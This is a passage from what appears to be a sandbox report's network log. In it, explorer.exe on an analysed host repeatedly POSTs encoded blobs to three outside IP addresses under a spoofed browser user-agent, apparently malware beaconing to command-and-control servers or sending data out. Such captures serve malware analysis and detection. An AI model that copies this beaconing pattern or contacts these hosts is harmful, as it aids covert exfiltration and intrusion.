qWeNXY9ES37Vs+rAXnCUyREgS81CeXk1AP/v6ukfGTUosuhc87ZWfpB7oy1HXDNY+9rteQmLpVEKilNRUxP3JQnCqC5nvA/It+k9HRSthctakounlrN+/ZL19Hb0Vp+6sXvtvNP7B6j0QzOACK8lwZop8WKMSyDhngdxU6lWt+DxEz28ccHH+4CUAz8dk0viOUHEV5LWhlEDyu1tkxawCLig8PLk64429+KpJNNhsUioA4QTgLO/8rige3DDYve
2024-07-27 06:56:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:33 UTC	685	IN	Data Raw: 4e 63 45 2f 48 57 39 64 4c 34 6d 62 38 4a 33 38 2b 49 2f 67 76 48 77 72 6c 34 48 56 4c 57 75 4b 58 4d 72 2b 55 31 2b 61 48 30 68 54 63 4c 6f 38 4e 66 76 54 79 7a 46 78 74 7a 4f 2f 4c 68 37 57 66 41 6d 53 77 30 34 2b 32 63 61 61 71 56 42 4f 61 6c 41 42 6e 79 63 49 57 6f 41 31 75 41 79 39 56 2b 45 33 78 65 76 32 78 65 7a 57 34 77 70 73 43 6d 66 61 75 6c 78 76 70 7a 56 67 58 76 47 76 39 52 34 70 4e 78 32 59 6a 71 55 49 72 48 70 2f 4b 30 77 46 69 4a 54 7a 53 53 6f 31 71 30 48 30 43 6a 31 64 33 37 6d 55 44 52 5a 6d 37 2b 55 72 36 6e 43 58 4a 32 72 4e 52 34 72 4c 48 36 45 44 7a 49 4e 35 67 6a 62 6f 44 69 49 46 72 51 34 53 44 77 43 65 51 50 51 6f 4b 54 67 72 41 32 4e 61 6c 77 58 4a 74 72 69 58 30 4f 65 76 6d 65 2f 6e 37 4f 53 32 5a 53 63 71 6a 4a 4b 66 67 68 6a Data Ascii: NcE/HW9dL4mb8J38+I/gvHwrl4HVLWuKXMr+U1+aH0hTcLo8NfvTyzFxtzO/Lh7WfAmSw04+2caaqVBOalABnycIWoA1uAy9V+E3xev2xezW4wpsCmfaulxvpzVgXvGv9R4pNx2YjqUIrHp/K0wFiJTzSSo1q0H0Cj1d37mUDRZm7+Ur6nCXJ2rNR4rLH6EDzIN5gjboDiIFrQ4SDwCeQPQoKTgrA2NalwXJtriX0Oevme/n7OS2ZScqjJKfghj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50820	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:34 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:34 UTC	1122	OUT	Data Raw: 59 5a 5a 7a 61 56 46 4c 72 55 4d 45 39 77 47 79 76 50 69 74 39 36 78 79 51 5a 45 50 2f 6a 62 74 49 61 70 39 4e 6d 47 4d 62 2b 67 45 2f 78 45 32 30 69 6e 4b 51 2f 78 4c 38 31 72 41 66 4b 57 53 53 4f 76 75 33 4d 58 37 47 47 74 6d 32 37 67 6d 43 62 73 68 58 6c 2b 71 4c 43 47 50 55 6a 36 69 41 45 68 57 6d 46 44 62 38 32 70 5a 4b 69 48 73 77 48 46 2f 36 51 6e 4f 39 59 31 6d 4a 34 56 47 62 69 48 74 5a 51 31 77 78 6a 2b 59 66 33 70 4a 6c 74 79 53 65 44 50 62 45 47 77 4f 31 53 64 43 72 68 70 79 55 78 55 43 4a 6b 43 6c 42 2f 62 4b 34 53 79 4f 38 79 34 72 35 6f 47 55 79 64 6b 32 36 61 46 67 76 33 30 74 52 43 52 54 64 48 65 6b 47 50 48 78 50 63 6f 79 59 78 34 76 54 4c 54 48 66 2f 6d 61 70 67 6a 6f 7a 78 67 59 74 33 6c 73 37 75 78 68 67 50 64 6f 4b 68 4c 58 31 34 33 Data Ascii: YZZzaVFLrUME9wGyvPit96xyQZEP/jbtIap9NmGMb+gE/xE20inKQ/xL81rAfKWSSOvu3MX7GGtm27gmCbshXl+qLCGPUj6iAEhWmFDb82pZKiHswHF/6QnO9Y1mJ4VGbiHtZQ1wxj+Yf3pJltySeDPbEGwO1SdCrhpyUxUCJkClB/bK4SyO8y4r5oGUydk26aFgv30tRCRTdHekGPHxPcoyYx4vTLTHf/mapgjozxgYt3ls7uxhgPdoKhLX143
2024-07-27 06:56:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:36 UTC	685	IN	Data Raw: 74 73 7a 75 4f 4b 49 4a 6c 58 57 58 34 78 2b 45 67 74 4d 49 41 48 4c 38 45 76 4c 57 7a 59 76 6b 6b 79 6e 6d 43 79 2b 62 78 62 64 6b 58 76 62 31 6c 54 63 6a 68 5a 4c 6d 79 34 6a 64 68 46 47 7a 52 69 41 75 36 33 79 32 2b 4a 4b 6f 4f 6e 71 6b 4c 76 55 58 53 38 30 5a 30 6c 32 70 67 49 62 38 6f 6b 34 55 63 46 42 55 65 72 5a 59 5a 65 74 38 45 68 39 62 6f 2f 32 56 75 57 2f 36 64 61 41 54 54 33 74 6b 79 45 72 65 6a 30 30 48 37 34 79 69 37 75 6d 74 54 59 2b 32 44 57 75 65 70 6f 45 38 2b 78 71 66 56 70 30 72 50 30 43 59 72 6b 32 39 2f 4d 4b 49 30 56 45 49 61 31 6b 58 55 7a 59 74 6d 75 4b 39 41 57 2b 37 33 51 71 57 7a 50 56 42 6a 67 6f 68 5a 59 33 33 35 55 67 72 48 55 66 55 35 79 66 69 52 4a 7a 39 63 52 54 2b 69 49 42 59 53 49 59 66 73 43 58 4b 54 6b 67 65 4d 2b 51 Data Ascii: tszuOKIJlXWX4x+EgtMIAHL8EvLWzYvkkynmCy+bxbdkXvb1lTcjhZLmy4jdhFGzRiAu63y2+JKoOnqkLvUXS80Z0l2pgIb8ok4UcFBUerZYZet8Eh9bo/2VuW/6daATT3tkyErej00H74yi7umtTY+2DWuepoE8+xqfVp0rP0CYrk29/MKI0VEIa1kXUzYtmuK9AW+73QqWzPVBjgohZY335UgrHUfU5yfiRJz9cRT+iIBYSIYfsCXKTkgeM+Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50821	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:56:36 UTC	1267	OUT	Data Raw: 45 73 67 70 45 5a 7a 37 36 39 44 31 4d 49 61 73 68 57 31 62 7a 44 7a 68 78 77 46 38 63 75 2b 50 62 44 41 67 48 35 76 39 43 65 2f 4c 41 37 72 6b 4b 69 50 76 41 6d 37 66 4e 71 78 4d 76 36 39 45 61 69 47 46 49 51 4f 2f 62 43 41 6e 32 5a 50 50 4e 49 78 6e 4f 6c 78 38 49 65 4b 64 66 5a 79 6d 6f 75 72 51 39 79 6d 32 77 6f 45 51 31 78 78 78 32 67 58 74 31 58 49 70 44 6e 4c 51 35 73 38 77 64 77 53 4f 2f 6a 69 31 6a 63 43 36 6d 48 68 79 34 61 42 55 68 49 41 68 49 56 6c 2f 70 6d 37 52 6a 56 77 50 45 42 54 58 77 71 45 64 30 46 42 72 30 31 37 41 5a 75 6e 62 41 75 6f 37 6c 78 51 68 62 31 42 71 61 4e 65 76 56 78 64 35 44 32 6f 32 49 4b 50 79 55 71 45 68 4c 46 47 4a 31 2f 64 57 54 4e 42 78 42 67 7a 73 4f 65 34 50 64 4c 33 7a 72 6c 4b 56 6f 76 32 77 31 6f 32 35 33 4c 6f Data Ascii: EsgpEZz769D1MIashW1bzDzhxwF8cu+PbDAgH5v9Ce/LA7rkKiPvAm7fNqxMv69EaiGFIQO/bCAn2ZPPNIxnOlx8IeKdfZymourQ9ym2woEQ1xxx2gXt1XIpDnLQ5s8wdwSO/ji1jcC6mHhy4aBUhIAhIVl/pm7RjVwPEBTXwqEd0FBr017AZunbAuo7lxQhb1BqaNevVxd5D2o2IKPyUqEhLFGJ1/dWTNBxBgzsOe4PdL3zrlKVov2w1o253Lo
2024-07-27 06:56:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:38 UTC	685	IN	Data Raw: 53 4c 50 70 69 62 2b 48 61 58 6e 46 55 50 78 6b 4b 39 6b 64 55 52 6b 5a 58 4e 58 68 44 4e 30 66 31 69 34 72 53 72 33 33 38 47 59 75 6a 69 61 30 72 74 32 75 76 42 54 54 62 50 33 46 61 79 62 43 59 2f 59 56 53 4f 4a 34 51 49 75 4f 5a 50 6d 53 47 46 6b 4c 66 4c 64 39 4c 46 70 30 66 33 6c 61 6c 69 31 33 31 34 61 61 64 65 38 53 37 44 31 6a 47 31 7a 73 43 51 6f 6b 56 2f 6c 32 6a 6c 5a 50 78 67 72 44 52 6c 44 42 39 6f 53 53 34 44 58 4a 31 43 4f 37 66 74 5a 58 4f 4d 6b 36 75 47 4f 5a 4e 6d 30 76 78 66 4e 70 78 78 63 6d 6a 32 71 59 37 42 67 69 63 49 59 36 52 4f 4c 6b 65 48 30 43 74 61 6a 36 78 52 32 78 66 33 79 76 4d 56 48 4b 33 2f 52 6b 34 4f 5a 4f 4e 78 63 6a 45 72 6b 30 61 47 2b 4b 35 6d 42 71 52 72 78 30 42 65 6e 52 78 6b 61 55 48 51 6f 44 32 7a 49 38 6b 71 61 Data Ascii: SLPpib+HaXnFUPxkK9kdURkZXNXhDN0f1i4rSr338GYujia0rt2uvBTTbP3FaybCY/YVSOJ4QIuOZPmSGFkLfLd9LFp0f3lali1314aade8S7D1jG1zsCQokV/l2jlZPxgrDRlDB9oSS4DXJ1CO7ftZXOMk6uGOZNm0vxfNpxxcmj2qY7BgicIY6ROLkeH0Ctaj6xR2xf3yvMVHK3/Rk4OZONxcjErk0aG+K5mBqRrx0BenRxkaUHQoD2zI8kqa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50822	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:39 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:39 UTC	1122	OUT	Data Raw: 69 32 44 75 48 50 36 56 41 79 68 75 55 47 4f 54 61 47 63 65 34 72 71 4f 65 69 4f 51 6b 64 39 4c 41 6c 6b 44 46 6f 43 64 37 77 36 6c 53 62 63 68 54 6e 4c 4b 32 2b 69 45 37 76 33 37 62 77 2b 56 43 42 4a 57 53 4f 58 65 69 48 7a 38 5a 58 49 77 51 4f 64 57 38 5a 2f 34 34 70 36 4f 66 53 6d 4a 49 53 4f 38 36 66 4a 48 79 39 32 42 41 58 50 69 45 61 6f 65 53 45 6b 53 77 74 74 42 76 73 6e 6f 69 4c 53 72 36 54 6b 4b 50 50 70 58 66 33 61 72 6f 76 6a 2b 2f 77 70 6f 46 73 37 35 4a 4c 32 66 42 71 2b 67 79 38 68 4b 74 68 31 77 30 77 72 75 54 72 72 31 45 72 61 65 2f 52 53 65 65 63 56 33 50 4d 65 79 64 6f 6e 75 36 2f 50 35 56 51 34 30 76 78 39 39 5a 4e 6a 38 58 63 72 44 64 71 35 4d 78 66 58 6d 30 6d 46 58 72 58 43 70 4b 72 54 32 51 4b 47 64 76 59 4d 35 41 78 6c 4b 59 4c 2f Data Ascii: i2DuHP6VAyhuUGOTaGce4rqOeiOQkd9LAlkDFoCd7w6lSbchTnLK2+iE7v37bw+VCBJWSOXeiHz8ZXIwQOdW8Z/44p6OfSmJISO86fJHy92BAXPiEaoeSEkSwttBvsnoiLSr6TkKPPpXf3arovj+/wpoFs75JL2fBq+gy8hKth1w0wruTrr1Erae/RSeecV3PMeydonu6/P5VQ40vx99ZNj8XcrDdq5MxfXm0mFXrXCpKrT2QKGdvYM5AxlKYL/
2024-07-27 06:56:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:40 UTC	685	IN	Data Raw: 6c 4d 5a 72 37 74 65 48 49 42 6c 36 4f 62 70 52 53 52 71 6b 62 73 75 30 77 38 65 45 43 74 6a 76 6f 6b 7a 39 49 64 55 34 32 4d 31 6d 55 45 64 5a 50 2f 75 42 53 2b 50 4e 77 69 35 57 41 73 2b 6a 69 54 6f 63 70 58 67 74 57 55 61 30 65 47 49 70 59 36 74 74 78 39 37 34 4d 4c 4a 61 57 4e 4d 6a 78 38 2f 69 56 33 68 4f 4e 72 42 30 61 58 68 5a 65 73 6f 4c 59 64 77 32 44 4a 6e 75 76 59 43 30 56 48 43 51 76 78 56 56 5a 38 69 38 57 69 72 6c 48 5a 73 58 42 4e 63 52 78 6c 36 58 30 50 36 43 73 6a 42 64 56 69 6e 31 31 6c 66 39 45 55 37 30 55 37 53 43 56 44 5a 41 4c 56 66 57 47 71 64 61 62 50 42 50 7a 55 48 55 6b 79 50 33 6f 75 48 76 2f 74 65 57 48 70 39 67 4d 72 2b 74 65 72 6b 34 7a 39 48 54 42 64 61 44 4e 7a 62 2b 2f 34 42 69 72 4b 4a 50 6a 4e 6c 4f 6b 5a 39 7a 4f 44 5a Data Ascii: lMZr7teHIBl6ObpRSRqkbsu0w8eECtjvokz9IdU42M1mUEdZP/uBS+PNwi5WAs+jiTocpXgtWUa0eGIpY6ttx974MLJaWNMjx8/iV3hONrB0aXhZesoLYdw2DJnuvYC0VHCQvxVVZ8i8WirlHZsXBNcRxl6X0P6CsjBdVin11lf9EU70U7SCVDZALVfWGqdabPBPzUHUkyP3ouHv/teWHp9gMr+terk4z9HTBdaDNzb+/4BirKJPjNlOkZ9zODZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50823	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:41 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:41 UTC	1122	OUT	Data Raw: 4d 35 42 4e 47 47 69 6e 75 58 37 4c 63 55 45 6f 68 32 6f 59 71 4b 41 4c 6f 53 6a 55 37 63 75 45 72 4c 2f 46 7a 57 67 62 56 52 58 4e 63 76 46 69 50 61 6f 54 32 4d 54 31 76 54 69 79 4f 50 75 46 4d 59 45 4d 65 31 32 5a 4b 2f 38 65 6f 58 45 45 6e 58 6d 64 4a 6e 6e 4f 52 33 59 76 36 68 54 7a 53 51 5a 51 35 65 73 58 6c 49 77 70 44 51 31 69 71 51 7a 2b 6c 71 35 41 4e 75 73 36 5a 49 68 45 78 51 50 5a 41 4a 6f 76 5a 61 79 76 7a 53 6e 61 38 2f 6c 55 69 63 32 71 48 56 70 78 32 41 48 6d 67 76 49 30 34 4c 75 52 78 65 69 76 41 67 54 57 79 76 59 78 42 45 6e 54 4b 78 2b 52 72 51 35 75 72 4f 43 69 37 65 45 55 37 6d 55 39 70 61 77 6f 76 4c 78 39 75 4f 76 6a 6e 47 71 34 64 56 6d 4f 68 7a 38 58 44 49 75 58 35 6b 4b 72 42 4b 51 37 51 56 67 31 53 61 46 6b 37 41 6f 4c 51 4f 77 Data Ascii: M5BNGGinuX7LcUEoh2oYqKALoSjU7cuErL/FzWgbVRXNcvFiPaoT2MT1vTiyOPuFMYEMe12ZK/8eoXEEnXmdJnnOR3Yv6hTzSQZQ5esXlIwpDQ1iqQz+lq5ANus6ZIhExQPZAJovZayvzSna8/lUic2qHVpx2AHmgvI04LuRxeivAgTWyvYxBEnTKx+RrQ5urOCi7eEU7mU9pawovLx9uOvjnGq4dVmOhz8XDIuX5kKrBKQ7QVg1SaFk7AoLQOw
2024-07-27 06:56:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:42 UTC	685	IN	Data Raw: 6e 70 42 51 63 79 4f 4c 44 65 6a 4a 4e 6d 4c 7a 32 5a 6a 37 72 33 49 66 38 52 32 4e 44 6c 36 73 67 37 4e 54 64 51 63 6d 70 6b 44 59 2b 76 33 59 47 67 5a 6e 4b 50 55 6c 64 63 4e 41 47 51 78 32 6c 56 30 6b 65 39 34 55 41 78 59 74 6c 74 33 39 4c 6e 30 34 6d 62 78 74 72 68 42 6b 75 79 44 47 7a 77 75 47 43 45 75 67 4a 75 52 6a 52 2b 4d 41 67 43 56 76 72 68 4b 66 71 54 6a 6d 48 53 67 71 5a 6d 57 49 53 76 53 6e 63 79 6d 7a 71 41 4e 75 62 32 6c 59 53 58 59 5a 75 70 58 34 6f 76 61 77 55 77 36 38 77 76 39 54 48 68 4f 69 62 58 75 36 79 2b 68 77 52 6f 48 59 61 45 59 56 55 51 64 37 62 68 46 4a 31 56 4b 31 69 6f 67 39 4c 51 77 33 55 47 4b 4e 44 6c 4a 35 45 68 30 6c 50 56 79 33 59 54 70 54 45 35 58 35 77 4a 4f 59 63 47 54 73 77 72 36 61 4a 66 32 64 34 73 6b 79 53 39 4d Data Ascii: npBQcyOLDejJNmLz2Zj7r3If8R2NDl6sg7NTdQcmpkDY+v3YGgZnKPUldcNAGQx2lV0ke94UAxYtlt39Ln04mbxtrhBkuyDGzwuGCEugJuRjR+MAgCVvrhKfqTjmHSgqZmWISvSncymzqANub2lYSXYZupX4ovawUw68wv9THhOibXu6y+hwRoHYaEYVUQd7bhFJ1VK1iog9LQw3UGKNDlJ5Eh0lPVy3YTpTE5X5wJOYcGTswr6aJf2d4skyS9M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50824	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:42 UTC	1122	OUT	Data Raw: 62 6a 45 4b 55 73 73 4d 58 34 4e 53 4b 4c 63 63 6f 6b 78 70 77 4e 5a 58 44 51 4c 44 49 36 45 7a 69 68 2f 61 2f 58 73 39 45 35 54 49 4a 52 43 6d 56 48 75 64 4b 43 57 79 39 45 36 73 31 74 55 2f 54 30 32 6e 4f 79 46 37 33 66 38 44 68 34 58 6f 4c 36 79 45 70 79 7a 43 41 5a 67 6e 35 50 30 64 79 42 59 61 39 51 37 32 74 7a 75 68 2b 62 56 79 57 6d 31 32 2f 62 45 4f 6e 53 47 6b 2f 32 4d 30 54 30 48 45 52 6c 33 43 6b 59 64 77 33 57 34 72 62 6a 32 33 4e 2b 4e 61 68 71 56 66 30 64 49 61 48 65 62 4b 64 39 56 46 71 37 43 48 57 68 74 49 72 6c 73 6a 79 77 63 43 30 68 33 42 51 76 36 6a 31 62 4a 6c 79 70 69 79 44 79 34 52 52 47 36 70 6b 4f 30 6a 61 7a 51 56 73 4d 47 55 52 41 73 41 75 71 6e 31 62 57 2b 77 4c 45 36 72 42 45 30 68 64 34 4f 46 63 34 6d 52 33 49 4e 75 76 6c 46 Data Ascii: bjEKUssMX4NSKLccokxpwNZXDQLDI6Ezih/a/Xs9E5TIJRCmVHudKCWy9E6s1tU/T02nOyF73f8Dh4XoL6yEpyzCAZgn5P0dyBYa9Q72tzuh+bVyWm12/bEOnSGk/2M0T0HERl3CkYdw3W4rbj23N+NahqVf0dIaHebKd9VFq7CHWhtIrlsjywcC0h3BQv6j1bJlypiyDy4RRG6pkO0jazQVsMGURAsAuqn1bW+wLE6rBE0hd4OFc4mR3INuvlF
2024-07-27 06:56:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:44 UTC	685	IN	Data Raw: 45 50 2f 39 4e 74 41 71 38 63 32 6e 30 6e 6c 67 4f 66 53 78 34 4a 5a 57 46 36 49 53 59 4a 54 66 4a 33 37 55 69 58 2f 4f 73 36 47 59 51 34 6d 6f 6e 69 75 34 36 30 71 38 6b 75 36 52 35 4f 67 78 32 54 4e 57 51 34 31 58 4c 43 69 4f 77 51 78 41 46 30 39 48 4e 2f 31 36 6b 5a 47 51 78 6b 66 61 51 44 31 33 37 6d 48 2b 48 68 2f 4e 64 6f 74 6e 77 71 38 65 4f 66 58 54 52 64 66 79 42 44 78 47 31 4d 65 79 46 51 44 49 41 48 45 33 43 53 56 71 4b 50 75 36 47 63 75 66 78 65 70 63 63 5a 54 4f 41 4b 79 65 46 6a 42 4d 68 2f 57 30 33 48 44 6d 57 68 37 54 37 4f 6e 47 62 67 41 4c 73 44 36 65 68 75 70 6f 61 74 36 42 65 52 73 30 79 53 2b 61 39 53 5a 49 2b 4b 4c 6c 53 5a 38 4d 6d 35 52 6a 46 43 32 36 6f 6f 2f 48 37 35 61 4e 50 6e 71 33 39 53 74 6f 76 6b 59 77 46 47 76 50 39 62 57 Data Ascii: EP/9NtAq8c2n0nlgOfSx4JZWF6ISYJTfJ37UiX/Os6GYQ4moniu460q8ku6R5Ogx2TNWQ41XLCiOwQxAF09HN/16kZGQxkfaQD137mH+Hh/Ndotnwq8eOfXTRdfyBDxG1MeyFQDIAHE3CSVqKPu6GcufxepccZTOAKyeFjBMh/W03HDmWh7T7OnGbgALsD6ehupoat6BeRs0yS+a9SZI+KLlSZ8Mm5RjFC26oo/H75aNPnq39StovkYwFGvP9bW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50825	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:44 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:44 UTC	1122	OUT	Data Raw: 43 64 4e 7a 42 73 55 48 50 6d 47 7a 46 69 4a 52 4b 37 45 73 52 46 33 79 79 4f 78 41 6e 4b 61 6f 2b 7a 39 73 68 7a 56 4c 66 53 6d 6a 42 4d 71 6e 6d 4a 6b 48 4b 71 6f 72 79 55 74 32 33 2b 55 51 49 39 49 44 42 47 49 43 4f 50 4a 56 30 43 73 46 49 70 73 5a 64 74 6a 58 41 58 79 4e 4a 4a 69 33 57 74 49 42 46 31 58 38 33 33 34 58 62 65 66 69 6c 38 68 50 74 70 7a 53 54 38 6b 71 75 2b 54 73 39 49 77 76 44 48 45 6d 6b 6b 36 2f 75 37 6c 4e 68 51 68 30 4e 67 6d 74 50 54 4f 45 41 44 66 57 43 51 38 79 63 6d 7a 2b 4a 41 46 48 6f 47 45 4f 4b 6e 53 37 65 6a 69 67 7a 5a 54 35 56 6f 37 5a 75 58 4c 73 34 49 4d 4f 77 46 33 42 4f 69 56 76 73 4a 30 44 43 70 71 62 4b 4f 59 53 49 4a 6e 73 66 48 78 54 50 54 6f 6e 66 62 4a 68 68 56 62 64 6a 58 75 65 39 6c 56 77 63 55 6d 33 2b 50 2b Data Ascii: CdNzBsUHPmGzFiJRK7EsRF3yyOxAnKao+z9shzVLfSmjBMqnmJkHKqoryUt23+UQI9IDBGICOPJV0CsFIpsZdtjXAXyNJJi3WtIBF1X8334Xbefil8hPtpzST8kqu+Ts9IwvDHEmkk6/u7lNhQh0NgmtPTOEADfWCQ8ycmz+JAFHoGEOKnS7ejigzZT5Vo7ZuXLs4IMOwF3BOiVvsJ0DCpqbKOYSIJnsfHxTPTonfbJhhVbdjXue9lVwcUm3+P+
2024-07-27 06:56:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:46 UTC	685	IN	Data Raw: 52 42 67 38 2f 2b 33 6a 53 66 6d 4c 49 6c 55 45 51 79 2f 58 31 46 65 49 35 36 57 72 4a 61 49 72 34 70 6e 2f 6a 63 42 71 69 4d 68 55 4a 4d 6f 61 38 6e 34 44 57 2f 70 6d 57 42 44 35 73 75 70 55 49 68 6b 76 50 46 4e 41 67 58 5a 6c 46 74 69 74 44 57 61 56 68 58 6a 59 4e 69 53 73 50 71 38 2b 6b 79 55 45 6a 56 65 45 43 57 54 45 42 42 72 6a 4e 38 7a 41 45 72 6d 54 76 36 35 78 67 78 52 50 50 61 43 4d 75 57 41 68 41 61 32 66 33 4e 41 4c 41 54 2f 2b 50 76 44 35 73 45 49 71 33 78 5a 6e 38 71 74 45 4d 77 34 35 48 4a 65 2f 38 67 32 6a 45 51 42 6c 77 6c 51 65 79 54 77 6c 33 48 79 66 51 69 4e 4d 48 70 31 6b 61 6b 2f 7a 48 39 35 69 32 56 39 68 70 42 39 34 47 69 69 6a 65 69 30 4d 37 71 6d 4b 66 62 38 63 4d 38 54 58 74 73 5a 64 50 70 76 6c 31 50 59 32 70 68 37 33 34 6b 4f Data Ascii: RBg8/+3jSfmLIlUEQy/X1FeI56WrJaIr4pn/jcBqiMhUJMoa8n4DW/pmWBD5supUIhkvPFNAgXZlFtitDWaVhXjYNiSsPq8+kyUEjVeECWTEBBrjN8zAErmTv65xgxRPPaCMuWAhAa2f3NALAT/+PvD5sEIq3xZn8qtEMw45HJe/8g2jEQBlwlQeyTwl3HyfQiNMHp1kak/zH95i2V9hpB94Giijei0M7qmKfb8cM8TXtsZdPpvl1PY2ph734kO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50826	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:46 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:46 UTC	1122	OUT	Data Raw: 55 77 45 4d 43 54 38 59 63 6f 37 31 36 57 56 71 34 74 75 47 53 7a 79 52 2b 4a 5a 57 63 77 6c 65 41 62 55 4f 76 59 46 31 6a 4c 55 69 36 62 7a 73 76 5a 57 46 4e 57 6d 6b 63 4b 4b 51 5a 35 6a 49 4a 33 49 50 33 58 6b 76 4d 4d 61 70 69 6f 59 52 32 50 2f 39 30 42 6c 6c 47 6f 2b 75 4e 34 79 4b 77 72 6b 2f 79 53 53 77 4b 4e 64 75 61 4d 77 31 48 34 6d 55 36 6b 6c 38 6b 7a 45 47 72 53 33 4a 6a 78 67 77 37 6f 58 30 79 54 47 6a 4b 44 34 65 54 77 6c 44 59 5a 55 34 71 4a 58 74 38 77 59 75 52 71 53 74 43 4b 4d 44 33 55 2f 65 48 52 46 57 71 4c 47 4b 74 4b 52 6a 53 59 38 43 6f 38 4c 6a 6c 47 31 6b 64 51 64 65 59 58 34 7a 58 58 70 71 6a 48 4a 70 77 61 43 65 4f 58 68 37 7a 79 6d 5a 75 58 36 62 53 33 4c 67 6f 36 4d 39 4a 50 36 47 37 64 37 56 2b 39 78 54 4b 6e 71 36 4f 59 63 Data Ascii: UwEMCT8Yco716WVq4tuGSzyR+JZWcwleAbUOvYF1jLUi6bzsvZWFNWmkcKKQZ5jIJ3IP3XkvMMapioYR2P/90BllGo+uN4yKwrk/ySSwKNduaMw1H4mU6kl8kzEGrS3Jjxgw7oX0yTGjKD4eTwlDYZU4qJXt8wYuRqStCKMD3U/eHRFWqLGKtKRjSY8Co8LjlG1kdQdeYX4zXXpqjHJpwaCeOXh7zymZuX6bS3Lgo6M9JP6G7d7V+9xTKnq6OYc
2024-07-27 06:56:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
